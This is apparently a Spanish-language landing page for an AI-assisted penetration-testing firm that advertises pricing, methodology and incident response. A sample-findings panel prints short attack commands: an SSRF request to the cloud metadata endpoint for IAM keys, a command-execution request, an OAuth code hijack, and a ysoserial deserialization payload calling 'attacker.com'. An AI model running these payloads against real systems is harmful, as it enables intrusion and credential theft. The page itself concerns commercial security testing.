Skip to content

LO QUE TU SCANNER NO VE,
NUESTRA IA LO EXPLOTA.

Pentesting con IA. Deteccion de 0-days. Reporte desde 24h. Desde $990.

Obtener reporte → Ver un reporte de ejemplo
87 vulns 3 zero-days 9 cadenas de ataque 48h de recon a reporte Engagement real · NDA

De kickoff a reporte desde 24 horas

Sin propuestas infladas. Cinco pasos. Nuestra IA ejecuta en horas lo que un equipo tarda semanas.

01 1 dia

Alcance y NDA

Envias targets, firmamos NDA, arrancamos

02 4h

Reconocimiento

Superficie de ataque, 300+ modulos con IA

03 24h

Explotacion

Confirmacion + cadenas de ataque

04 mismo dia

Reporte

Evidencia, CVSS, playbook de remediacion

05 30 dias

Retest

Verificacion de fixes, gratis

Retest incluido: verificamos fixes criticos a los 30 dias. Sin costo extra.

Tu scanner encontro 0 criticos. Nosotros encontramos esto.

Desde tu app hasta la infra que la sostiene. Con IA que razona sobre tu codigo y genera exploits especificos.

Web, APIs y movil

OWASP Top 10, logica de negocio, auth bypass, IDOR, SSRF, SQLi. REST, GraphQL, gRPC. Android e iOS — estatico + dinamico.

Infraestructura y cloud

Servicios expuestos, LLMNR/NTLM relay. AWS, Azure, GCP — IAM, buckets, IMDS. Docker, K8s, Helm, registries.

Active Directory e identidad

Kerberos, OAuth 2.0, SAML, OIDC, SSO. Credenciales, movimiento lateral, escalacion de privilegios.

Post-explotacion y reporte

Cadenas de ataque, escalacion de privilegios, evidencia reproducible, CVSS v3.1, playbook de remediacion.

Motor de 0-days con IA

Nuestro sistema propietario analiza el codigo fuente de frameworks y CMS en tiempo real. Deteccion de vulnerabilidades desconocidas via analisis de taint, diff mining entre versiones y descubrimiento de gadget chains. Hallazgos que ningun scanner encuentra.

Pentesting asistido por IA

Combinamos 300+ modulos automatizados con validacion experta humana. La IA prioriza vectores de ataque, genera payloads adaptativos y bypasea WAFs en tiempo real. Resultados de un equipo de 20 pentesters en una fraccion del tiempo.

OWASP WSTG PTES NIST 800-115 MITRE ATT&CK PCI-DSS 4.0 SOC 2 ISO 27001

No cubrimos: seguridad fisica, ingenieria social presencial, malware, SOC/SIEM continuo.

TECNOLOGIA PROPIA

Motor de IA que encuentra lo que los scanners no ven

Nuestro sistema no depende de firmas ni bases de datos publicas. Analiza codigo fuente, razona sobre flujos de datos y genera exploits especificos para tu stack.

01

Clonado de framework

Detectamos la version exacta de cada framework y CMS. Clonamos el codigo fuente de la version precisa que corre tu servidor.

WordPressDrupalLaravelDjangoSpringExchangeZimbraNextCloud
02

Analisis de taint interprocedural

La IA traza el flujo de datos desde cada input HTTP hasta cada sink peligroso (SQL, comandos, deserializacion). Cruza funciones, archivos y modulos.

Source → SinkCross-file60+ patterns8 languages
03

Diff mining entre versiones

Comparamos tu version con la siguiente release para encontrar parches silenciosos — vulnerabilidades que el vendor corrigio sin publicar CVE.

Parches silenciosos git diffCVE gap
04

Generacion de PoC y explotacion

Para cada vulnerabilidad confirmada, la IA genera un exploit especifico con los parametros exactos, el encoding correcto y bypass de WAF adaptativo. Lo testea contra tu servidor en vivo.

PoCWAF bypassGadget chainsLive test
300+ modulos automatizados
60+ patrones de sink por lenguaje
8 lenguajes soportados
48h de kickoff a reporte

Cada industria tiene sus propios riesgos. Los conocemos.

No hacemos pentests genericos. Adaptamos la metodologia a tu stack, tu regulacion y tus datos criticos.

Fintech

PCI-DSS 4.0, OAuth/OIDC, logica de pagos, race conditions en transacciones, API keys expuestas, IDOR en cuentas.

PCI-DSS 4.0

Healthcare

HL7/FHIR, DICOM, portales de pacientes, sistemas clinicos, integraciones de laboratorio, datos de salud protegidos.

HIPAA

Gobierno

Active Directory, Exchange, VPN, firewalls, infraestructura legacy, datos ciudadanos, firma electronica.

ISO 27001

E-commerce

Manipulacion de precios, IDOR en pedidos, bypass de cupones, inyeccion en pasarelas de pago, account takeover.

PCI-DSS

SaaS / Cloud

Multi-tenant isolation, SSRF a metadata cloud, IAM misconfig, CI/CD injection, secrets en repos, container escape.

SOC 2

Crypto / Web3

Smart contracts, bridges, custodial wallets, API de exchanges, flash loan attacks, front-running.

Auditoria Smart Contract

5,155 reglas de scanner. 0 hallazgos.
Nuestro motor con IA encontro 87. Incluyendo 3 zero-days.

Datos reales de engagements · Clientes bajo NDA · 3 industrias

rekon v8.0
0findings
Critical3
High24
Medium24
Low11
Scanner (5,155 rules)0
Rekon0
CRIT 9.8

OAuth Token Hijack → Admin Takeover

$ curl /callback?code=ATTACKER_CODE&state=VICTIM_STATE {"access_token":"eyJ...","role":"admin"}
CRIT 9.4

SSRF → Cloud Metadata → IAM Keys

$ curl "app.target.com/proxy?url=http://169.254.169.254/latest/" AccessKeyId: AKIA*** // full IAM credentials
HIGH 8.8

WAF Bypass via Non-Standard Port → RCE

$ curl https://target.com:8443/admin/exec?cmd=id uid=0(root) // port 443 blocked, 8443 direct
HIGH 8.1

Deserialization Chain → Reverse Shell

$ java -jar ysoserial.jar CommonsCollections5 "curl attacker.com" HTTP callback received — RCE confirmed

“Encontraron lo que tres auditorias anteriores no vieron.” — CTO

Ver reporte →

Precios publicados. La mitad del mercado. Sin letra chica.

Elegi el plan que se ajuste a tu superficie de ataque. Todos incluyen reporte con evidencia reproducible, CVSS y retest gratuito.

PROMO MARZO Pentest Recon 100% gratis este mes — sin compromiso, sin tarjeta. Conoce tu superficie de ataque real. Reclamar →
GRATIS

Recon

Escaneo externo automatizado. Tu primer panorama de riesgo.

$0 solo este mes
  • 1 dominio — vista externa
  • Descubrimiento de subdominios y puertos
  • Fingerprinting de tecnologias y versiones
  • Deteccion de CVEs conocidos
  • Reporte PDF ejecutivo
  • Entrega en 24 horas
Solicitar gratis →

Starter

Una aplicacion web, cobertura OWASP completa con explotacion manual.

$990 USD
  • 1 aplicacion web — 1 dominio
  • OWASP Top 10 + OWASP API Top 10
  • Explotacion manual de hallazgos
  • Reporte PDF con evidencia reproducible y CVSS
  • 1 retest a 30 dias
  • Entrega en 48-72 horas
  • Soporte por email
Solicitar Starter →
MAS ELEGIDO

Professional

Web + API, explotacion profunda, logica de negocio y cadenas de ataque.

$2,990 USD
  • Web + API (REST, GraphQL, WebSocket)
  • OWASP Top 10 + logica de negocio + IDOR
  • Post-explotacion y cadenas de ataque
  • Reporte PDF + HTML interactivo + SARIF
  • Playbook de remediacion priorizado
  • 2 retests en 60 dias
  • Entrega en 48 horas
  • Canal directo Slack/email
Obtener Professional →

Infrastructure

Servidores, red, Active Directory, Exchange, VPN. Pentest interno y externo.

$5,990 USD
  • Red externa + interna (hasta 256 IPs)
  • Active Directory: Kerberoast, ADCS, DCSync, GPO
  • Exchange / mail server: ProxyShell, relay, spray
  • VPN, firewalls, segmentacion de red
  • Escalacion de privilegios y movimiento lateral
  • Reporte con mapa de red y cadenas de ataque
  • 3 retests en 90 dias
  • Entrega en 3-5 dias
Solicitar Infrastructure →

Red Team

Simulacion de ataque real. Web + infra + AD + cloud + ingenieria social + phishing.

$9,990 USD
  • Todo lo de Infrastructure incluido
  • Cloud: AWS, Azure, GCP (IAM, S3, metadata)
  • Phishing + ingenieria social personalizada
  • Evasion de WAF, EDR, SIEM
  • Mobile (Android + iOS) si aplica
  • Reporte ejecutivo + tecnico + MITRE ATT&CK mapping
  • Retests ilimitados en 90 dias
  • Pentester dedicado + Slack + calls
  • Entrega en 5-7 dias
Solicitar Red Team →
Enterprise Alcance 100% personalizado. Pentest continuo, bug bounty gestionado, compliance (PCI-DSS, ISO 27001, SOC 2). Pentester dedicado, SLA garantizado, retests ilimitados.
Contactar →

RESPUESTA DE EMERGENCIA

Tu organizacion fue vulnerada?
Empezamos en 2 horas.

Incident response inmediato. Identificamos el vector de entrada, evaluamos el alcance del compromiso, contenemos la amenaza y documentamos todo para cumplimiento regulatorio.

  • SLA de 2 horas para inicio de respuesta
  • Analisis forense del vector de ataque
  • Contencion y erradicacion de la amenaza
  • Reporte para reguladores (URCDP, AGESIC, auditores)
  • Pentest post-incidente para verificar remediacion
EMERGENCIA
$4,990 USD

Incluye 72h de respuesta activa + reporte forense + pentest post-incidente.

Contactar ahora →

Disponible 24/7. Respuesta en menos de 1 hora.

FAQ

Preguntas frecuentes

Cuanto tarda un test de penetracion?

Depende del alcance. Recon: 24h. Starter: 48-72h. Professional: 48h. Infrastructure: 3-5 dias. Red Team: 5-7 dias. Nuestro motor de IA ejecuta 300+ modulos en paralelo — entregamos lo que a un equipo de 20 pentesters le toma semanas.

Que incluye el reporte de pentesting?

Un reporte tecnico con evidencia reproducible y scoring CVSS v3.1, un resumen ejecutivo para la gerencia, un playbook de remediacion priorizado y retest gratuito a 30 dias. Formatos: PDF, HTML, SARIF y CycloneDX.

Es solo un escaneo automatizado de vulnerabilidades?

No. La automatizacion descubre; nuestros ingenieros de seguridad validan, encadenan vulnerabilidades y redactan cada hallazgo. Cada resultado pasa por revision manual experta antes del reporte.

Mas preguntas? hello@rekon.sh

3 slots disponibles este mes

TU PROXIMO PENTEST
EMPIEZA HOY.

Obtener reporte

Desde $990 USD · Sin suscripcion · Retest incluido